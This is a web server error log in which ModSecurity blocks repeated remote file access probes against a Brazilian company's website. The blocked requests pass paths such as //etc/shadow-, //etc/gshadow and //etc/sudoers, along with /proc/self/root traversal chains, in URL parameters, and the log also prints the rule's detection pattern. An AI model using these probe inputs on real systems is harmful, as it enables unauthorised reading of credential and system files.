[Fri Mar 20 11:33:00.127650 2026] [:error] [pid 31215:tid 140411540502272] [client 216.73.216.191:46246] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/gshadow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1anAF0L0L-SsrnPo6XjQAAAtg"]
[Fri Mar 20 11:33:00.869813 2026] [:error] [pid 11642:tid 140411607643904] [client 216.73.216.191:46132] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/filesystems"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1anLninkcc-iUj5AqK9gAAA5A"]
[Fri Mar 20 11:33:01.138953 2026] [:error] [pid 7235:tid 140411699963648] [client 216.73.216.191:46318] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/kdump.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1anfqxLDW4GITHUkQYPAAAAQU"]
[Fri Mar 20 11:33:01.496320 2026] [:error] [pid 11167:tid 140411683178240] [client 216.73.216.191:46332] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/netconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1anfHIg5MgXLBnicMjzgAAAcc"]
[Fri Mar 20 11:33:02.067626 2026] [:error] [pid 11642:tid 140411666392832] [client 216.73.216.191:46364] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/libuser.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1anrninkcc-iUj5AqK9wAAA4k"]
[Fri Mar 20 11:33:02.739345 2026] [:error] [pid 15826:tid 140411548894976] [client 216.73.216.191:46406] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hosts.allow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1anuoXxyEfFpUF8f-t7gAAAVc"]
[Fri Mar 20 11:33:04.429550 2026] [:error] [pid 7893:tid 140411557287680] [client 216.73.216.191:46410] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/services"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1anhCii7xarUs8iHaYlQAAAhY"]
[Fri Mar 20 11:33:04.436674 2026] [:error] [pid 31215:tid 140411658000128] [client 216.73.216.191:46394] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/machine-id"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1anwF0L0L-SsrnPo6XkQAAAso"]
[Fri Mar 20 11:33:04.436727 2026] [:error] [pid 9818:tid 140411607643904] [client 216.73.216.191:46422] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/xinetd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1an11pVZ5mVmJwsFNcvgAAAFA"]
[Fri Mar 20 11:33:04.439715 2026] [:error] [pid 21219:tid 140411649607424] [client 216.73.216.191:46432] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sudoers"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1an_XLqtnMIWvjpaLJMAAAAos"]
[Fri Mar 20 11:33:06.061702 2026] [:error] [pid 26799:tid 140411691570944] [client 216.73.216.191:46498] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/centos-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1aoda6ubjKNq_cu4YJwgAAA0Y"]
[Fri Mar 20 11:33:06.073392 2026] [:error] [pid 15826:tid 140411658000128] [client 216.73.216.191:46440] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/os-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1aoeoXxyEfFpUF8f-t8wAAAUo"]
[Fri Mar 20 11:33:06.537863 2026] [mime_magic:error] [pid 7893:tid 140411632822016] (70014)End of file found: [client 216.73.216.191:46548] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:33:08.011409 2026] [:error] [pid 11167:tid 140411641214720] [client 216.73.216.191:46578] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subuid-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1apPHIg5MgXLBnicMj0wAAAcw"]
[Fri Mar 20 11:33:09.264861 2026] [:error] [pid 9818:tid 140411582465792] [client 216.73.216.191:46726] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sudo-ldap.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1apV1pVZ5mVmJwsFNcwgAAAFM"]
[Fri Mar 20 11:33:10.433150 2026] [:error] [pid 15826:tid 140411540502272] [client 216.73.216.191:46802] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/profile"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1apuoXxyEfFpUF8f-t9wAAAVg"]
[Fri Mar 20 11:33:12.380766 2026] [:error] [pid 26799:tid 140411632822016] [client 216.73.216.191:46854] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/shadow-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1ap9a6ubjKNq_cu4YJxwAAA00"]
[Fri Mar 20 11:33:14.122699 2026] [:error] [pid 9818:tid 140411607643904] [client 216.73.216.191:46852] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hostname"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1aql1pVZ5mVmJwsFNczQAAAFA"]
[Fri Mar 20 11:33:23.876126 2026] [:error] [pid 21219:tid 140411582465792] [client 74.7.241.31:60106] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1as_XLqtnMIWvjpaLJSQAAApM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 11:33:25.193516 2026] [:error] [pid 10189:tid 140411674785536] [client 74.7.241.31:37334] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1atTJ3M9BSuKP7CAZVqgAAAIg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 11:33:26.804141 2026] [:error] [pid 15826:tid 140411548894976] [client 216.73.216.191:47296] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/locales.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1atuoXxyEfFpUF8f-t_gAAAVc"]
[Fri Mar 20 11:33:28.132882 2026] [:error] [pid 15826:tid 140411540502272] [client 216.73.216.191:47346] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rc.local"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1auOoXxyEfFpUF8f-uBQAAAVg"]
[Fri Mar 20 11:33:28.939420 2026] [:error] [pid 11167:tid 140411540502272] [client 216.73.216.191:47408] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dir_colors.lightbgcolor"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1auPHIg5MgXLBnicMj3gAAAdg"]
[Fri Mar 20 11:33:35.358970 2026] [:error] [pid 26799:tid 140411666392832] [client 216.73.216.191:47786] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/printcap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1av9a6ubjKNq_cu4YJ2AAAA0k"]
[Fri Mar 20 11:33:35.880393 2026] [:error] [pid 7235:tid 140411716749056] [client 216.73.216.191:47826] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/chrony.keys"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1av_qxLDW4GITHUkQYWAAAAQM"]
[Fri Mar 20 11:33:53.295313 2026] [:error] [pid 11642:tid 140411607643904] [client 57.141.18.11:49002] [client 57.141.18.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1a0bninkcc-iUj5AqLHQAAA5A"]
[Fri Mar 20 11:34:02.149784 2026] [mime_magic:error] [pid 11167:tid 140411607643904] (70014)End of file found: [client 57.141.18.6:49474] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:34:06.331200 2026] [:error] [pid 11642:tid 140411691570944] [client 57.141.18.94:49780] [client 57.141.18.94] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1a3rninkcc-iUj5AqLJQAAA4Y"]
[Fri Mar 20 11:34:08.915117 2026] [:error] [pid 11642:tid 140411548894976] [client 216.73.216.191:49934] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/host.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1a4Lninkcc-iUj5AqLJgAAA5c"]
[Fri Mar 20 11:34:09.014000 2026] [:error] [pid 10189:tid 140411582465792] [client 216.73.216.191:49938] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subuid"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1a4TJ3M9BSuKP7CAZV8wAAAJM"]
